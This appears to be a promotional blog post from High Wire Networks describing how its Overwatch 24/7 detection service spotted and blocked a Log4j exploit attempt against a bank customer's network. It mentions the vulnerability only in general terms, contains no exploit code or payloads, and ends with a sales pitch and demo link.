Log4j, a vulnerability in the Java-based software, allows attackers to execute code remotely on a targeted computer and steal data, install malware or take control. The head of the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) calls the exploit “one of the most serious flaws” in the software and could have widespread security implications.
On Thursday, Overwatch 24/7, an open XDR (extended detection and response) platform managed by the Overwatch Security Operations Center (SOC), detected traffic coming from a known malicious public IP to the end customer’s network. Overwatch identified the traffic as a Log4j attempted exploit at the firewall, alerted the partner, and stopped it from infiltrating the network.
“During the incident, Overwatch was in close contact with the bank and continued to run scans on the network for the exploit,” according to the partner.
“Our partners also had first-hand knowledge of the Log4j exploitation when we sent out a vulnerability alert with cybersecurity recommendations and put custom detections in place based on published indicators of compromise (IOC),” said High Wire CISO Phil Burnett. “Over the weekend, we also continuously updated our platform with threat detection capabilities by adding detections for the exploitations.”
Overwatch 24/7 is the centerpiece of High Wire Networks’ Managed Security Services Marketplace, which offers organizations end-to-end protection for networks, endpoints, cloud, physical, perimeter, applications, and users. With an affordable subscription, Overwatch security experts monitor, detect, and respond to threats around the clock, delivering defense in depth for managed service providers (MSP) partners and their customers.
Ask us how we can deliver end-to-end cybersecurity and drill down on real threats for your business and clients: https://www.highwirenetworks.com/overwatch/demo/
Leave a Reply